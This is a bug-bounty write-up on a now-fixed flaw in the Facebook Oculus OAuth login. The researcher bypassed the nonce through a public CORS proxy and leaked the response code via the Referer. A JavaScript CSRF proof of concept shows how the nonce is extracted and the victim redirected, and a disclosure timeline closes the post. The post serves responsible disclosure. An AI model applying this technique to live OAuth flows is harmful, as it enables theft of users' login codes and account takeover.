Bypass OAuth nonce and steal Oculus response code

This post is about a bug I found in the Facebook Oculus application's OAuth flow which could have been used to bypass the nonce and steal the response_code.


Recently Facebook added an OAuth login feature for Oculus, which means a user can log in to Oculus directly with a Facebook account. There is, however, a nonce parameter in the URL that I had never seen in any other OAuth flow, so I started to dig deeper into it.

OAuth Authorisation URL for Facebook Oculus:

Request:

Response: ,lonbrqie5fdwjD-x6jsnI5wnZ4XaDIRMixFoRqtQSne406BwOo2nSVS2o1MmmXkLW_zaW5Vy0SW6&state=d916afa3-3dc1-bab8-fc9d-3c8f44bfe7b7#_=_

The nonce acts as a CSRF token protecting the user from CSRF attacks: if the nonce value does not match, the OAuth request is aborted and the redirect_url is not followed.

In this OAuth flow I had two challenges:

1. Bypass the nonce

2. Bypass the redirect_url

Bypassing the nonce is not that easy, but I decided to try. After some testing I had learned nothing (zero progress).

When I Googled around I came across CORS proxies: free services for developers who need to bypass the same-origin policy when making standard AJAX requests to third-party services.

There are some online proxy servers:


When I passed the OAuth URL through such a proxy server, it responded with the source code of the given URL. When I searched that source for the nonce, I could not believe it: the nonce value in the real request and the one obtained through the CORS request were the same.

So I had bypassed the nonce; now it was time to bypass the redirect URL. I started exploring, and it turned out to be easier than I thought: the URL below redirects the response_code to my app domain through Referer leakage.

Now I had bypassed both the nonce and the redirect_url, but to reproduce the whole process with one click, a CSRF PoC had to be created.

The code below first makes a CORS request and extracts the nonce value from the returned source code. Finally it combines Final_url + nonce in window.location and makes the request.

var Cors_URL = "";   // CORS proxy URL (value omitted in the post)
var Final_url = "";  // OAuth authorisation URL up to the nonce parameter (value omitted in the post)
var xhttp = new XMLHttpRequest();
xhttp.open("GET", Cors_URL, true);
xhttp.onload = function() {
  // Extract the nonce from the proxied page source: the text between "nonce=" and the next "&".
  var str = xhttp.response.split("nonce=")[1] || "";
  var nonce = str.split("&")[0];
  if (nonce.length == 0) {
    alert("Sorry! nonce not found..");
  } else {
    alert("nonce : " + nonce);
    Final_url = Final_url + nonce;
    window.location = Final_url;
  }
};
xhttp.onerror = function() {
  alert("Please try again.");
};
xhttp.send();

Video PoC:

To reproduce this bug the victim must be logged in to both Facebook and Oculus, because the redirect_uri works only when the user is logged into their Oculus account.

The Fix:

The leakage of the nonce value through the CORS proxy and the redirect_uri from Oculus to Facebook were both fixed.


30-June-2017: Report sent

6-July-2017: Facebook responded that they were not able to reproduce the issue

6-July-2017: Additional details provided by me

1-August-2017: Further investigation by Facebook

10-August-2017: Fixed by Facebook

14-August-2017: $10,000 bounty awarded by Facebook


Web Security Researcher
